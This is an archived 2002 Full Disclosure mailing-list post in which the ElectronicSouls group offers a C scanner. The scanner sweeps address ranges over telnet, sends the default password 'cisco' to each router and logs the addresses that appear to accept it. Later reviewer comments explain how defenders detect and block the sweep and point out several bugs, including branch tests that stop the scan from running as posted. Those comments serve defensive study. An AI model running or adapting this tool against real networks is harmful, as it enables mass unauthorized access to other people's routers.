Full Disclosure mailing list archives
[ElectronicSouls] Cisco scanner
From: es () hush com
Date: Fri, 29 Nov 2002 01:56:51 -0800
-----BEGIN PGP SIGNED MESSAGE----- Your cisco routers are not safe.
/* 4553-Cisco Scanner Cisco Scanner will scan for Cisco Routers that still got their default password set. */

/*
 * Reviewer summary (defensive reading of the listing exactly as posted).
 *
 * What the code does: for every address in the range given on the command
 * line it forks a child that opens a TCP connection to port 23 (telnet),
 * reads the login banner, sends the single password guess "cisco" and, if
 * the reply does not look like a repeated password prompt, appends the
 * address to the file enable.cisco in the current directory.
 *
 * What a defender would see: one source host opening short-lived telnet
 * connections to consecutive addresses, each carrying one identical
 * password attempt and then closing. Failed-login logging on the vty lines
 * and flow/IDS rules for sequential port-23 sweeps both cover this.
 *
 * What removes the exposure: replace factory/default line passwords,
 * restrict vty access (an access-class ACL on "line vty"), and prefer SSH
 * over telnet ("transport input ssh") with per-user authentication.
 *
 * The listing also contains several C defects; they are marked inline with
 * NOTE(review). The code is left byte-for-byte as posted.
 */

/* NOTE(review): memset(), memcmp() and strcpy() are used below, but
 * <string.h> is not among the headers included here. */
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>

/* Shorthand for the generic socket address type used in the connect() cast. */
#define ES struct sockaddr
/* Length argument passed to connect(). */
#define SIZE sizeof(struct sockaddr_in)
/* Size of the scratch buffer in ipv4_ntop(): 15 characters of dotted quad plus the terminator. */
#define ADDR 16

int ConnectCheck(struct sockaddr_in, int);
const char *ipv4_ntop(int, const void *, char *, size_t);

/* Handle for the results file; opened and closed inside ConnectCheck(). */
FILE *stream;

/*
 * Entry point: parse <IP> <class> and the optional -c / -t settings, print a
 * banner, then walk the address range and fork one ConnectCheck() child per
 * address. Exits 1 on bad arguments and 0 once no children remain.
 */
int main(int argc, char *argv[])
{
  int i=0, o=0, p=0, status, childs=120, timeout=5, class=0;
  /* NOTE(review): 15 bytes cannot hold a full dotted quad plus its NUL
   * (15 characters + 1), and argv[1] is copied in with an unbounded
   * sprintf() below, so IP can be overrun on the stack. */
  /* NOTE(review): c is a plain char but receives getopt()'s int result;
   * where char is unsigned the comparison with -1 below cannot succeed. */
  char IP[15],*NET,c;
  struct sockaddr_in DestAddress;

  if(argc < 3) {
    printf(" 0x4553\n");
    printf(" usage: %s <IP> <class> [option]\n",argv[0]);
    printf(" class A : %s 234 A \n",argv[0]);
    printf(" class B : %s 234.10 B \n",argv[0]);
    printf(" class C : %s 234.10.23 C \n",argv[0]);
    printf(" -c childs \n");
    printf(" -t timeout \n");
    printf(" Output: enable.cisco \n\n");
    exit(1);
  }
  NET = argv[1];
  /* NOTE(review): class is declared int, so this stores a (possibly
   * truncated) pointer value, not the letter the user typed. */
  class = argv[2];
  opterr = 0; /* silence getopt()'s own error messages */
  while((c = getopt(argc, argv, "c:t:")) != -1) {
    switch(c) {
      /* atoi() reports no errors; non-numeric input becomes 0 and is caught by the range checks below. */
      case 'c': childs = atoi(optarg); break;
      case 't': timeout = atoi(optarg); break;
    }
  }
  if(childs < 1) { printf("invalid number of childs\n"); exit(1); }
  if(timeout < 1) { printf("invalid timeout\n"); exit(1); }
  printf("\n\n-= 0x4553 Cisco Hacker =-\n");
  printf("-= scan's for cisco's with factory password set. =-\n");
  printf("-= (C) ElectronicSouls. =-\n\n");
  /* NOTE(review): every class=="X" test below compares that stored pointer
   * value with the address of a string literal rather than comparing
   * characters, so in practice none of these branches is expected to be
   * taken in the listing as posted. That is not a reason to leave default
   * passwords in place. */
  /* NOTE(review): the status text names cisco.txt, but the only file the
   * code writes is enable.cisco; "threads" here are forked processes. */
  if (class=="A") fprintf(stderr, "Scanning: %s.*.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout);
  if (class=="B") fprintf(stderr,"Scanning: %s.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n", NET,childs,timeout);
  if (class=="C") fprintf(stderr,"Scanning: %s.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout);
  DestAddress.sin_family = AF_INET;
  DestAddress.sin_port = htons(23); /* telnet */
  /* Three octets appended to the prefix. */
  if (class=="A") {
    for(p = 0; p < 256; p++) {
      for(o = 0; o < 256; o++) {
        for(i = 0; i < 256; i++) {
          /* After the first childs+1 forks, reap one child before starting
           * another, which roughly caps the number of live children. */
          if (i > childs || o > 0 || p > 0 ) { wait(&status); }
          sprintf(IP, "%s.%d.%d.%d", NET,p,o,i);
          /* Return value unchecked: a malformed string leaves the previous address in place. */
          inet_aton(IP, &DestAddress.sin_addr);
          /* Child runs the check and never returns (ConnectCheck ends in exit());
           * a failed fork() (-1) is silently skipped. */
          if(!fork()) ConnectCheck(DestAddress, timeout);
        }
      }
    }
  }
  /* Two octets appended to the prefix; same throttling and fork pattern. */
  if (class=="B") {
    for(o = 0; o < 256; o++) {
      for(i = 0; i < 256; i++) {
        if (i > childs || o > 0) { wait(&status); }
        sprintf(IP, "%s.%d.%d", NET,o,i);
        inet_aton(IP, &DestAddress.sin_addr);
        if(!fork()) ConnectCheck(DestAddress, timeout);
      }
    }
  }
  /* One octet appended to the prefix; same throttling and fork pattern. */
  if (class=="C") {
    for(i = 0; i < 256; i++) {
      if (i > childs) { wait(&status); }
      sprintf(IP, "%s.%d", NET, i);
      inet_aton(IP, &DestAddress.sin_addr);
      if(!fork()) ConnectCheck(DestAddress, timeout);
    }
  }
  /* Poll without blocking until waitpid() reports that no children are left, then exit. */
  for(;;) {
    if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(0);
  }
}

/*
 * Runs in a forked child: connect to DestAddr, exchange the login prompt and
 * one password guess, and record the address when the heuristic below fires.
 * Declared int but never returns; every path ends in exit().
 *
 * timeout is passed to alarm(). No SIGALRM handler is installed anywhere in
 * this listing, so the default action applies when the timer fires
 * (presumably the author relies on that to end a stalled child).
 */
int ConnectCheck(struct sockaddr_in DestAddr, int timeout)
{
  int result,ret,sock;
  char Hostname[60],buffer1[64],buffer2[64];
  if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE);
  alarm(timeout); /* bounds the connect() */
  result = connect(sock, (ES *)&DestAddr, SIZE);
  if (!result) {
    alarm(timeout); /* re-arm for the read/send exchange */
    memset(buffer1, '\0', 64);
    memset(buffer2, '\0', 64);
    if ((ret = read(sock, buffer1, 64)) > 0) {
      /* The second read overwrites whatever the first one stored in buffer1;
       * its return value, like those of send() and the third read, is not checked. */
      ret = read(sock, buffer1, 64);
      send(sock,"cisco\r",6,0);
      ret = read(sock, buffer2, 64);
      /* Heuristic: buffer1 must start with the 40-byte "User Access
       * Verification ... Password" prompt, and buffer2 must NOT start with
       * "\r\nPass" (a repeated prompt). A failed or empty third read leaves
       * buffer2 zeroed, which also satisfies the first test, so an entry in
       * the output file is not proof of a successful login. */
      if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40))) {
        /* NOTE(review): fopen() result is used without a NULL check. */
        stream = fopen("enable.cisco","a");
        printf("[!] -- Cisco found: %s --\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
        fprintf(stream,"%s\n", ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
        fclose(stream);
      }
    }
    close(sock);
  }
  exit(0);
}

/*
 * Format the four bytes at addrptr as a dotted-quad string in strptr.
 * Returns strptr for AF_INET; for any other family prints a message and
 * returns a null pointer.
 *
 * NOTE(review): len is never consulted; the copy into strptr is an unbounded
 * strcpy(). The callers in this listing pass a 60-byte buffer, which is
 * larger than the ADDR-byte temporary being copied.
 */
const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len)
{
  const u_char *es = (const u_char *)addrptr;
  if(family == AF_INET) {
    char temp[ADDR];
    snprintf(temp, sizeof(temp), "%d.%d.%d.%d", es[0], es[1], es[2], es[3]);
    strcpy(strptr, temp);
    return(strptr);
  }
  printf("Address family not supported by protocol.\n");
  return(0);
}
The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Talking to me, punk?" -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nPCAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltyg0AoKlg+3BuyQWs U4rEK1oCrfYhpgViAJ9qF1K1T0BeWK9KDFoxauS5CCdZmg== =GNfO -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html